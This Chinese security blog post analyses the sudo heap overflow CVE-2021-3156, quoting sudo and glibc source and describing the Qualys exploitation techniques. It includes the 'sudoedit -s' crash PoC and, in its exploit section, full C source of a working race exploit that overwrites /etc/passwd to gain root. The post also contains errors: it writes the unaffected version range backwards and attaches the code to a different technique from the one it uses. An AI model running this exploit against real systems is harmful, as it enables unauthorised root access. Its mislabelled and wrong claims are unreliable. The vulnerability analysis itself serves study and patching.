追洞小组 | Linux sudo提权CVE-2021-3156分析复现及exp的编写(上)

最新推荐文章于 2023-06-28 16:40:06 发布
最新推荐文章于 2023-06-28 16:40:06 发布
阅读量1.2k 收藏 6
点赞数 1
文章标签: linux java 信息安全 安全 ubuntu
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shuteer_xu/article/details/114302958
版权

文章来源|MS08067 WEB攻防知识星球

本文作者:不言(Ms08067实验室追洞小组成员)

漏洞复现分析  认准追洞小组

一、漏洞介绍

Qualys 公司的研究团队在⼏乎所有主流 Unix 类操作系统都部署的 sudo 中发现了⼀个隐藏近10年之久的堆溢出漏洞,可导致任意低权限⽤户在使⽤默认 sudo 配置的易受攻击主机上获得 root权限。该漏洞被命名为“Baron Samedit”,是研究员对 Baron Samedi 和 sudoedit 的戏称。sudo 是⼀款⼏乎包含在所有基于 Unix 和 Linux 操作系统中的强⼤⼯具,可使⽤户以其它⽤户的安全权限运⾏程序。该漏洞本身隐藏了近10年之久。它源⾃2011年7⽉ (commit 8255ed69) 。这个漏洞易遭利⽤,⽤户⽆需是权限⽤户或者位于 sudoers 列表中。例如,甚⾄是“nobody”账户也可利⽤该漏洞。

影响版本

sudo 1.8.2 – 1.8.31p2
sudo 1.9.0 – 1.9.5p1

不受影响版本

sudo =< 1.9.5p2

二、漏洞分析

官方链接

https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt

如果执⾏sudo,在"shell"模式下运⾏命令(shell -c 命令):

  • 或者通过 -s 选项,设置sudo的 MODE_SHELL 标记;

  • 或者通过 -i 选项,设置sudo的 MODE_SHELL 和 MODE_LOGIN_SHELL 标记;

之后在sudo的main()的开头,parse_args()重新写argv(第609-617⾏),将所有命令⾏参数(第587-595⾏),并且⽤反斜杠转义所有元字符(第590-591)。

571     if (ISSET(mode, MODE_RUN) && ISSET(flags, MODE_SHELL)) {
572     char **av, *cmnd = NULL;
573     int ac = 1;
...
581     cmnd = dst = reallocarray(NULL, cmnd_size, 2);
...
587     for (av = argv; *av != NULL; av++) {
588     for (src = *av; *src != '\0'; src++) {
589    /* quote potential meta characters */
590   if (!isalnum((unsigned char)*src) && *src != '_'&& *src != '-' && *src != '$')
591   *dst++ = '\\';
592   *dst++ = *src;
593    }
594   *dst++ = '';
595    }
...
600   ac += 2; /* -c cmnd */
...
603   av = reallocarray(NULL, ac + 1, sizeof(char *));
...
609   av[0] = (char *)user_details.shell; /* plugin may overrideshell */
610   if (cmnd != NULL) {
611   av[1] = "-c";
612   av[2] = cmnd;
613    }
614   av[ac] = NULL;
615
616   argv = av;
617   argc = ac;
618    }

在 sudoers_policy_main() 中, set_cmnd() 将命令⾏参数放⼊基于堆的缓冲区 user_args (第864-871⾏),并且取消转义元字符(第866-867⾏),来实现sudoers的匹配和记录。

819     if (sudo_mode & (MODE_RUN | MODE_EDIT | MODE_CHECK)) { 
... 
852             for (size = 0, av = NewArgv + 1; *av; av++) 
853                 size += strlen(*av) + 1; 
854            if (size == 0 || (user_args = malloc(size)) == NULL) { 
... 
857             } 
858             if (ISSET(sudo_mode, MODE_SHELL|MODE_LOGIN_SHELL)) { 
... 
864      for (to = user_args, av = NewArgv + 1; (from = *av); av++) { 
865                     while (*from) { 
866        if (from[0] == '\\' && !isspace((unsigned char)from[1])) 867                             from++; 
868                         *to++ = *from++; 
869                     } 
870                     *to++ = ' '; 
871                 } 
... 
884             } 
... 
886     }

不幸的是,如果命令以单个反斜杠结尾的字符,然后:

在第866行,from[0]是反斜杠,而from[1]是参数的null终止符(不是空格);在C语言中\\代表一个\。
在第867行,from自增指向null终止符;
在第868行,将null终止字符复制到user_args缓冲区,而from再次自增并且指              向null后面的字符(超过参数边界);
在第865-869行的while循环读取并越界复制字符到user_args缓冲区。

换句话来说,setcmnd()容易受到堆的缓冲区溢出,因为复制到`userargs`缓冲区外的字符不在计算的大小中(在第852-853计算)。

但是从理论上将任何命令行参数都不能够以单个反斜杠结束:如果设置了MODE_SHELL和MODE_LOGIN_SHELL标记(第858行,获取易受攻击代码的必要条件),则设置 MODE_SHELL(第571行),然后parse_args() 已经转义了所有的元字符,包括反斜杠(它通过第二个反斜杠转义了所有的单个反斜杠)。

但是实际上,set_cmnd()中易受攻击的代码和转义符parse_args()中的代码被不同的条件限制:

 819     if (sudo_mode & (MODE_RUN | MODE_EDIT | MODE_CHECK)) { 
 ... 
 858     if (ISSET(sudo_mode, MODE_SHELL|MODE_LOGIN_SHELL)) {
 571     if (ISSET(mode, MODE_RUN) && ISSET(flags, MODE_SHELL)) {

那么我们的问题是:我们可以设置MODE_SHELL MODE_EDIT MODE_CHECK(获取易受攻击的代码),而不使用默认的MODE_RUN(以避免转义代码)

答案是否定的,如果我们设置了MODE_EDIT(-e选项,第361行)或者MODE_CHECK(-l选项,第423行和第519行),则parse_args()从 valid_flags 删除 MODE_SHELL(第363行和424行)而如果我们指定一个无效标记MODE_SHELL(第532行至533行),则会以一个错误退出:

358                 case 'e':
...
361                     mode = MODE_EDIT;
362                     sudo_settings[ARG_SUDOEDIT].value = "true";
363                     valid_flags = MODE_NONINTERACTIVE;
364                     break;
...
416                 case 'l':
...
423                     mode = MODE_LIST;
424                     valid_flags = MODE_NONINTERACTIVE|MODE_LONG_LIST;
425                     break;
...
518     if (argc > 0 && mode == MODE_LIST)
519         mode = MODE_CHECK;
..
532     if ((flags & valid_flags) != flags)
533         usage(1);

但是发现一个问题:如果我们以sudoedit而非sudo来执行sudo,则parse_args() 自动设置MODE_EDIT(第270行)但并未重置 valid_flags,而valid_flags 默认包括 MODE_SHELL(第127行和249行):

127 #define DEFAULT_VALID_FLAGS     (MODE_BACKGROUND|MODE_PRESERVE_ENV|MODE_RESET_HOME|MODE_LOGIN_SHELL|MODE_NONINTERACTIVE|MODE_SHELL)
...
249     int valid_flags = DEFAULT_VALID_FLAGS;
...
267     proglen = strlen(progname);
268     if (proglen > 4 && strcmp(progname + proglen - 4, "edit") == 0) {
269         progname = "sudoedit";
270         mode = MODE_EDIT;
271         sudo_settings[ARG_SUDOEDIT].value = "true";
272     }

因此,如果我们执行sudoedit -s,那么我们将同时设置MODE_EDIT和MODE_SHELL(但不是MODE_RUN),我们避免了转义代码,到达易受攻击的代码,并通过基于堆的缓冲区溢出user_args一个以单个反斜杠字符结尾的命令行参数:

sudoedit -s '\' `perl -e 'print "A" x 65536'`malloc(): corrupted top sizeAborted (core dumped)

从攻击者的角度来看,这个缓冲区溢出是理想的:

我们可以控制被溢出的user_args缓冲区的大小(连接的命令行参数的大小,在852-854行);
我们可以独立控制溢出本身的大小和内存(我们的最后一个命令参数之后是首个环境变量,不包含在852行到853行的计算大小中);
我们甚至可以把空字节写入溢出的缓冲区(每个以单个反斜杠结尾的命令行参数或环境变量将空字节写入user_args中,在866行-868行)

例如,在 amd64 Linux 上,如下命令分配一个24字节大小的 user_args 缓冲区(32字节大小的堆块)并通过 “A=A\0B=B\0” 覆写下一个块的size字段 (0x00623d4200613d41),以“C=c\0D=d\0” (0x00643d4400633d43) 覆写 fd 字段,以 E=e\0F=f\0” (0x00663d4600653d45) 覆写 bk 字段:

env -i 'AA=a\' 'B=b\' 'C=c\' 'D=d\' 'E=e\' 'F=f' sudoedit -s '1234567890123456789012\'
-------------------------------------------------------------------------
-|--------+--------+--------+--------|--------+--------+--------+--------+--  
|        |        |12345678|90123456|789012.A|A=a.B=b.|C=c.D=d.|E=e.F=f.|--|
--------+--------+--------+--------|--------+--------+--------+--------+--              
size  <---- user_args buffer ---->  size      fd       bk

三、利用分析

1、struct sudo_hook_entry overwrite

引起我们注意的第一个崩溃是:

Program received signal SIGSEGV, Segmentation fault.
0x000056291a25d502 in process_hooks_getenv(name=name@entry=0x7f4a6d7dc046 "SYSTEMD_BYPASS_USERDB", value=value@entry=0x7ffc595cc240) at ../../src/hooks.c:108
=> 0x56291a25d502 <process_hooks_getenv+82>:    callq  *0x8(%rbx)
rbx            0x56291c1df2b0      94734565372592
0x56291c1df2b0: 0x4141414141414141      0x4141414141414141

令人惊讶的是,sudo的函数process_hooks_getenv()崩溃了(在108行),因为我们改写了指针getenv_fn(基于堆的结构sudo_hook_entry):

 99 int100 process_hooks_getenv(const char *name, char **value)
 101 {
 102     struct sudo_hook_entry *hook;
 103     char *val = NULL;
 ...
 107     SLIST_FOREACH(hook, &sudo_hook_getenv_list, entries) {
 108         rc = hook->u.getenv_fn(name, &val, hook->closure);

要利用此struct sudo_hook_entry overwrite,我们要注意:

对getenv_fn的调用(在第108行)以及对execve()的调用:

int execve(const char *filename, char *const argv[ ], char *const envp[ ]);

name(SYSTEMD_BYPASS_USERDB)与execve()的路径名参数;
&val(一个指向空指针的指针)与execve()的argv;
hook-> closure(NULL指针)与execve()的envp;

我们可以通过劫持函数指针getenv_fn(指向共享库sudoers.so中的函数sudoers_hook_getenv())在存在ASLR的情况下进行部分覆写;幸运的是sudoers.so开始包含了对execve()或(execv())的调用:

0000000000008a00 <execv@plt>:
    8a00:       f3 0f 1e fa             endbr64     
    8a04:       f2 ff 25 65 55 05 00    bnd jmpq *0x55565(%rip)        # 5df70 <execv@GLIBC_2.2.5>    
    8a0b:       0f 1f 44 00 00          nopl   0x0(%rax,%rax,1

首先我们可以暴力漏洞参数,直到用一个无效的用户地址(高于0x800000000000)覆盖getenv_fn,直到getenv_fn的调用出现一般保护错误:

sudoedit[15904] 
general protection fault ip:55e9b645b502 sp:7ffe53d6fa40 error:0 in sudo[55e9b644e000+1a000]                                     
^^^

接下来,我们重新利用这些漏洞参数,但用一个有效的(低于0x800000000000)但未映射的用户地址来覆盖getenv_fn,在这个示例中,getenv_fn是我们覆盖的第22个指针。

sudoedit[15906]: segfault at 
323230303030 ip 0000323230303030 sp 00007ffeeabf2868 error 14 in sudo[55b036c16000+5000]
^^^^

最后,我们部分覆盖getenv_fn(我们用0x8a00覆盖它的两个最不重要的字节,sudoers.so中execv()的偏移量,用0x00覆盖它的第三个字节。user_args在set_cmnd()中的空终结符),直到我们打败ASLR。我们很有可能在2^(3*8-12)=2^12=4096次尝试后,用execv()的地址覆盖getenv_fn,从而以root身份执行我们自己的二进制文件,命名为 "SYSTEMDBYPASSUSERDB"。

2、 struct service_user overwrite

引起我们注意的第二次崩溃是:

Program received signal SIGSEGV, Segmentation fault.
0x00007f6bf9c294ee in nss_load_library (ni=ni@entry=0x55cf1a1dd040) at nsswitch.c:344
=> 0x7f6bf9c294ee <nss_load_library+46>:        cmpq   $0x0,0x8(%rbx)
rbx            0x41414141414141    18367622009667905

glibc的函数nss_load_library()崩溃了(在第344行),因为我们重写了指针library,它是基于堆的结构service_user的成员:

327 static int328 nss_load_library (service_user *ni)
329 {
330   if (ni->library == NULL)
331     {
...
338       ni->library = nss_new_service (service_table ?: &default_table,
339                                      ni->name);
...
342     }
343 
344   if (ni->library->lib_handle == NULL)
345     {
346       /* Load the shared library.  */
347       size_t shlen = (7 + strlen (ni->name) + 
348                       + strlen (__nss_shlib_revision) + 1);
349       int saved_errno = errno;
350       char shlib_name[shlen];
351 
352       /* Construct shared object name.  */
353       __stpcpy (__stpcpy (__stpcpy (__stpcpy (shlib_name,
354                                               "libnss_"),
355                                     ni->name),
356                           ".so"),
357                 __nss_shlib_revision);
358 
359       ni->library->lib_handle = __libc_dlopen (shlib_name);

我们可以轻松地将service_user覆盖转换为任意代码执行:

我们使用NULL指针覆盖ni-> library,以在第330-342行输入该块,避免在第344行崩溃,并在第344-359行输入该块;
我们用 X / X覆盖ni-> name(字符数组,最初为 systemd);
第353-357行构造共享库libnss_X / X.so.2的名称(而不是 libnss_systemd.so.2);
在第359行,我们从以下位置加载了自己的共享库libnss_X / X.so.2 当前工作目录并以root身份执行_init()构造函数。
3、def_timestampdir overwrite

第三个漏洞利用不是来自sudo的崩溃,而是来自一个偶然的观察结果:在暴力之下,sudo在我们的工作目录(AAAAAA, AAAAAAAAA, etc)中创建了数十个新目录,这些目录每个都属于root,并且只包含了一个以我们自己的用户命名的小文件:sudo的timestamp file。我们重写了def_timestampdir,sudo的timestamp directory。

如果我们用尚不存在的目录名覆盖def_timestampdir,则可以与sudo的ts_mkdirs()竞争,创建指向任意文件的符号链接,然后:

chown()这个任意文件到用户root和组root;
以root用户身份打开(或创建)任意文件,并编写一个结构 timestamp_entry。

我们无法将转换为完全root特权(例如,如果我们将自己的SUID二进制文件chown()转换为root,则内核会自动删除二进制文件的SUID位)。

最终我们使用第二种方法提升为root权限。

我们通过sudo的timestamplock()中的一个小bug,我们赢得了与`tsmkdirs()和timestamp_open()的竞争,并且我们的任意符号链接指向etc/passwd`,那么这个文件就会以root身份打开。

 65 struct timestamp_entry { 
 66     unsigned short version;     /* version number */ 
 67     unsigned short size;        /* entry size */ 
 68     unsigned short type;        /* TS_GLOBAL, TS_TTY, TS_PPID */ .. 
 78 };
 305 static ssize_t 
 306 ts_write(int fd, const char *fname, struct timestamp_entry *entry, off_t offset) 
 307 { 
 ... 
 318         nwritten = pwrite(fd, entry, entry->size, offset); 
 ... 
 350 }
 619 bool 
 620 timestamp_lock(void *vcookie, struct passwd *pw) 
 621 { 
 622     struct ts_cookie *cookie = vcookie; 
 623     struct timestamp_entry entry; 
 ... 
 644     nread = read(cookie->fd, &entry, sizeof(entry)); 
 645     if (nread == 0) { 
 ... 
 652     } else if (entry.type != TS_LOCKEXCL) { 
 ... 
 657     if (ts_write(cookie->fd, cookie->fname, &entry, 0) == -1)

在第644行,/etc/passwd的前0x38字节("root: x:0:0:..."),被读入了timestamp_entry类型的entry。

在第652行,entry.tpye是0x783a (":x"),不是TS_LOCKEXCL。

在第657行和318行,将entry->size的字节写入/etc/passwd,entry->size的值实际已经被覆盖为0x746f("ot"),而不是sizeof(struct timestamp_entry)。

我们将sudo堆栈的内容全部写入/etc/passwd(命令行参数和环境变量),将任意用户写入/etc/passwd获得root权限。

四、POC的验证

以非root用户登录系统,并使用命令sudoedit -s /

  • 如果响应一个以sudoedit:开头的报错,那么表明存在漏洞。

  • 如果响应一个以usage:开头的报错,那么表明补丁已经生效。

五、Exp的编写

利用struct service_user overwrite

https://github.com/blasty/CVE-2021-3156

// Exploit by @gf_256 aka cts// With help from r4j// Original advisory by Baron Samedit of Qualys// Tested on Ubuntu 18.04 and 20.04// You will probably need to adjust RACE_SLEEP_TIME.
#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <stdlib.h>
#include <assert.h>
#include <unistd.h>
#include <sys/wait.h>
#include <sys/types.h>
#include <sys/resource.h>
#include <sys/stat.h>
#include <unistd.h>
#include <fcntl.h>
#include <pwd.h>
// !!! best value of this varies from system-to-system !!! // !!! you will probably need to tune this !!! 
#define RACE_SLEEP_TIME 10000
char *target_file;
char *src_file;
size_t query_target_size(){
    struct stat st;
    stat(target_file, &st);
    return st.st_size;
}
char* read_src_contents(){
    FILE* f = fopen(src_file, "rb");
    if (!f) {
        puts("oh no baby what are you doing :(");
        abort();
    }    
fseek(f, 0, SEEK_END);    
long fsize = ftell(f);    
fseek(f, 0, SEEK_SET);    
char *content = malloc(fsize + 1);    
fread(content, 1, fsize, f);    
fclose(f);    
return content;}
char* get_my_username(){    
// getlogin can return incorrect result (for example, root under su)!    
struct passwd *pws = getpwuid(getuid());    
return strdup(pws->pw_name);}
int main(int my_argc, char **my_argv){    
puts("CVE-2021-3156 PoC by @gf_256");    
puts("original advisory by Baron Samedit");        
if (my_argc != 3) {        
puts("./meme <target file> <src file>");        
puts("Example: ./meme /etc/passwd my_fake_passwd_file");        
return 1;    
}    
target_file = my_argv[1];    
src_file = my_argv[2];    
printf("we will overwrite %s with shit from %s\n", target_file, src_file);    
char* myusername = get_my_username();    
printf("hi, my name is %s\n", myusername);    
size_t initial_size = query_target_size();    
printf("%s is %zi big right now\n", target_file, initial_size);    
char* shit_to_write = read_src_contents();    
char memedir[1000];    
char my_symlink[1000];    
char overflow[1000];    
char* bigshit = calloc(1,0x10000);    
memset(bigshit, 'A', 0xffff);
 // need a big shit in the stack so the write doesn't fail with bad address    
char *argv[] = {"/usr/bin/sudoedit", "-A", "-s", "\\",    overflow,    NULL    };    
char *envp[] = {        
"\n\n\n\n\n", // put some fucken newlines here to separate our real contents from the junk        
shit_to_write,        
"SUDO_ASKPASS=/bin/false",        
"LANG=C.UTF-8@aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",     
bigshit,        
NULL    
};    
puts("ok podracing time bitches");    
for (int i = 0; i < 5000; i++) {        
sprintf(memedir, "ayylmaobigchungussssssssssss00000000000000000000000000%08d", i);        
sprintf(overflow, "11111111111111111111111111111111111111111111111111111111%s", memedir);        
sprintf(my_symlink, "%s/%s", memedir, myusername);        
puts(memedir);                
if (access(memedir, F_OK) == 0) {            
printf("dude, %s already exists, do it from a clean working dir\n", memedir);            
return 1;        
}        
pid_t childpid = fork();        
if (childpid) 
{ 
// parent            
usleep(RACE_SLEEP_TIME);            
mkdir(memedir, 0700);            
symlink(target_file, my_symlink);            
waitpid(childpid, 0, 0);        
}
 else { // child            
setpriority(PRIO_PROCESS, 0, 20);
 // set nice to 20 for race reliability            
execve("/usr/bin/sudoedit", argv, envp); 
// noreturn            
puts("execve fails?!");            
abort();        
}        
if (query_target_size() != initial_size) {            
puts("target file has a BRUH MOMENT!!!! SUCCess???");            
system("xdg-open 'https://www.youtube.com/watch?v=4vkR1G_DUVc'"); // ayy lmao            
return 0;        
}    
}    
puts("Failed?");    
puts("if all the meme dirs are owned by root, the usleep needs to be decreased.");    
puts("if they're all owned by you, the usleep needs to be increased");    
return 0;}

六、Exp的gdb调试

未完待续...

扫描下方二维码加入星球学习

加入后会邀请你进入内部微信群,内部微信群永久有效!

 

 

目前36000+人已关注加入我们


Ms08067安全实验室
关注
centos7-sudo-1.9.9.rpm包。修复CVE-2021-3156Sudo堆缓冲区溢出漏洞
01-30
此为centos7版的最新sudo-1.9.9.rpm包,修复修复CVE-2021-3156漏洞。 升级步骤: 1、将RPM包上传到服务器上, 2、执行升级命令: # rpm -Uvh sudo-1.9.9-1.el7.x86_64.rpm 3、执行完毕后,查询sudo版本: # sudo -V
分析|CVE-2021-3156-sudo堆溢出高危漏洞
zhangge3663的博客
01-29 613
编辑前言 Qualys的安全研究人员于1月13日发文称,攻击者无需知道用户密码即可成功利用此漏洞,在众多基于 Linux 的发行版本中获得最高的 root 权限。受影响的 Sudo 漏洞版本包括从 1.8.2 到 1.8.32p2 的经典版本,以及从 1.9.0 到 1.9.5p1 所有稳定版本。 调试方式 首先从github下载代码: https://github.com/sudo-project/sudo/archive/SUDO_1_9_5p1.tar.gz 编译 tar xf su
[漏洞分析] CVE-2021-3156 sudo提权分析exp调试修改
热门推荐
Breeze的博客
01-24 1万+
本文提供CVE-2021-3156漏洞的docker调试环境;并对该漏洞原理以及利用细节、堆布局方法进行详细分析
CVE-2021-3156 sudo堆溢出分析与利用
qq_41252520的博客
01-29 1667
CVE-2021-3156 0x0 简介 sudoLinux比较常用的命令,它允许普通用户获得临时的root身份执行特权指令,保障了Linux系统的安全。 0x1 漏洞复现 【环境】:ubuntu18.04 【版本】:sudo-1.8.27 ​ 输入以下POC: sudoedit -s '\' `perl -e 'print "A" x 65536'` 0x2 漏洞分析 (1)环境搭建 首先通过输入命令查看当前系统使用的版本 sudo --version 下载合适的sudo,解压并编译。 (2
Sudo堆溢出漏洞(CVE-2021-3156)复现
最新发布
蚁景网安学院
06-28 1145
2021 年 1 月 26 日,Qualys Research Labs在 sudo 发现了一个缺陷。sudo 解析命令行参数的方式时,错误的判断了截断符,从而导致攻击者可以恶意构造载荷,使得sudo发生堆溢出,该漏洞在配合环境变量等分配堆以及释放堆的原语下,可以致使本地提权
CVE-2021-3156 漏洞复现笔记
weixin_46483787的博客
07-01 1万+
CVE-2021-3156复现笔记
CVE-2021-3156:有关CVE-2021-3156的注意事项
05-24
CVE-2021-3156 注意:这些说明是我自己的,并摘自我做过的信息流。 如果有任何问题,请通知我。 首先信任官方消息! 大家好, 几天前,在sudo中发现了严重的基于堆的缓冲区溢出,任何本地用户都可以利用该缓冲区...
CVE-2021-3156:CVE-2021-3156的PoC(sudo堆溢出)
03-06
CVE-2021-3156 CVE-2021-3156的PoC(sudo堆溢出)。 通过@ gf_256 aka cts进行利用。 感谢超级猜测者的r4j的帮助。 感谢Qualys的Braon Samedit提供的。重要的提示/ etc / passwd的修改时间必须比系统启动时间新,...
CVE-2021-3156:在Debain 10上利用Sudo堆溢出(CVE-2021-3156
04-05
CVE-2021-3156 CVE-2021-3156:Debain 10的Sudo堆溢出利用全文: :目前已测试: 须藤 Version 1.8.27 (1.8.27-1+deb10u2) Checksum (sha256): ca4a94e0a49f59295df5522d896022444cbbafdec4d94326c1a7f333fd030038...
CVE-2021-3156:CVE-2021-3156
03-06
【描述】:“CVE-2021-3156”是一个严重且影响广泛的漏洞,被称为“Baron Samedit”或“SudoCmd”,它影响了广泛使用的Sudo命令行工具,允许本地攻击者获得系统上的完全根权限。这个漏洞存在于Sudo的`sudoedit`命令...
【更新:EXP公开】CVE-2021-3156Sudo 堆缓冲区溢出漏洞通告
爱国小白帽
02-22 2390
报告编号:B6-2021-020102 报告来源:360CERT 报告作者:360CERT 更新日期:2021-02-01 0x01更新概览 2021年01月31日,360CERT监测发现安全研究员blasty公开了CVE-2021-3156漏洞利用代码。本次更新漏洞状态及复现截图。 具体更新详情可参考漏洞详情。 0x02漏洞简述 2021年01月27日,360CERT监测发现RedHat发布了sudo 缓冲区/栈溢出漏洞的风险通告,该漏洞编号为CVE-2021-3156,漏洞等级:高危,漏洞评分:7.0.
CVE-2021-3156Sudo 堆缓冲区溢出漏洞通告
爱国小白帽
01-27 4144
报告编号:B6-2021-012701 报告来源:360CERT 报告作者:360CERT 更新日期:2021-01-27 0x01漏洞简述 2021年01月27日,360CERT监测发现RedHat发布了sudo 缓冲区/栈溢出漏洞的风险通告,该漏洞编号为CVE-2021-3156,漏洞等级:高危,漏洞评分:7.0。 攻击者在取得服务器基础权限的情况下,可以利用sudo基于堆的缓冲区溢出漏洞,获得root权限。 目前debain已经修复该漏洞,centos依然受到影响 对此,360CERT建议广大用户及.
Linux sudo本地提权漏洞(CVE-2021-3156
yangbz123的博客
02-02 2468
Linux sudo本地提权漏洞 漏洞介绍 Qualys研究小组sudo中发现了堆溢出漏洞,这是一个几乎无处不在的实用工具,可以在主要的类Unix操作系统上使用。任何非特权用户都可以利用此漏洞在易受攻击的主机上使用默认sudo配置获得根权限。 当sudo通过-s或-i命令行选项在shell模式下运行命令时,它将在命令参数中使用反斜杠转义特殊字符。但使用-s或 -i标志运行sudoedit时,实际上并未进行转义,从而可能导致缓冲区溢出。只要存在sudoers文件(通常是 /etc/sudoers),攻击者就
CVE-2021-3156sudo提权漏洞
RAFANra的博客
03-21 672
CVE-2021-3156漏洞复现 漏洞名称:Linux sudo权限提升漏洞 漏洞描述:1月26日,sudo发布安全通告,修复了一个类Unix操作系统在命令参数中,转义反斜杠时存在基于堆的缓冲区溢出漏洞。当sudo通过-s或-i命令行选项在shell模式下运行命令时,它将在命令参数中使用反斜杠转义特殊字符。但使用-s或-i标志运行sudoedit时,实际上并未进行转义,从而可能导致缓冲区溢出。因此只要存在sudoers文件(通常是/etc/sudoers),攻击者就可以使用本地普通用户,利用sudo获得
Linux sudo权限提升漏洞复现(CVE-2021-3156)
deng_menglihua的博客
04-19 398
Linux sudo权限提升漏洞复现(CVE-2021-3156) 1.简介 sudolinux系统管理指令,是允许系统管理员让普通用户执行root命令的一个工具。 2.漏洞概述 编号:CVE-2021-3156sudo解析命令行参数的方式中发现了基于堆的缓冲区溢出。任何本地用户都可以利用此漏洞,不需要进行身份验证,也不用知道用户的密码。利用成功可以获得root权限。 3.影响版本 sudo 1.9.0 到 1.9.5p1 所有版本 sudo 1.8.2 到 1.8.31p2 所有版本 4.环
CVE-2021-3156:隐藏10年之久的 Sudo 漏洞,可使任意用户获得root 权限(详述)
smellycat000的专栏
01-27 1035
聚焦源代码安全,网罗国内外最新资讯!编译:奇安信代码卫士团队Qualys 公司的研究团队在几乎所有主流 Unix 类操作系统都部署的 sudo 中发现了一个隐藏近10年之久的堆溢出漏洞...
【漏洞复现Linux sudo权限提升漏洞 (CVE-2021-3156)
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
08-22 829
2021年1月26日,Linux安全工具sudo被发现严重的基于堆缓冲区溢出漏洞。利用这一漏洞,攻击者无需知道用户密码,一样可以获得root权限,并且是在默认配置下。此漏洞已分配为CVE-2021-3156,危险等级评分为7分。当sudo通过-s或-i命令行选项在shell模式下运行命令时,它将在命令参数中使用反斜杠转义特殊字符。但使用-s或-i标志运行sudoedit时,实际上并未进行转义,从而可能导致缓冲区溢出。
CVE-2021-3156 Sudo溢出漏洞
m0_48520508的博客
02-04 1705
0x00简介 sudolinux系统管理指令,是允许系统管理员让普通用户执行一些或者全部的root命令的一个工具,如halt、reboot、su等等。这样不仅减少了root用户的登录 和管理时间,同样也提高了安全性。sudo不是对shell的一个代替,它是面向每个命令的。 0x01漏洞概述 2021年01月26日,sudo被披露存在一个基于堆的缓冲区溢出漏洞(CVE-2021-3156,该漏洞被命名为“Baron Samedit”),可导致本地权限提升。 当在类Unix的操作系统上执行命令时,非root用
sudo堆缓冲区溢出提权漏洞(CVE-2021-3156
Ryan的博客
01-13 2868
sudo堆缓冲区溢出提权漏洞(CVE-2021-3156
cve-2021-40444漏洞kali复现
04-06
以下是在Kali Linux复现cve-2021-40444漏洞的步骤: 1. 安装 OpenOffice 打开终端并输入以下命令: ``` sudo apt update sudo apt install openoffice ``` 2. 创建恶意文档 使用文本编辑器创建一个名为“恶意...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值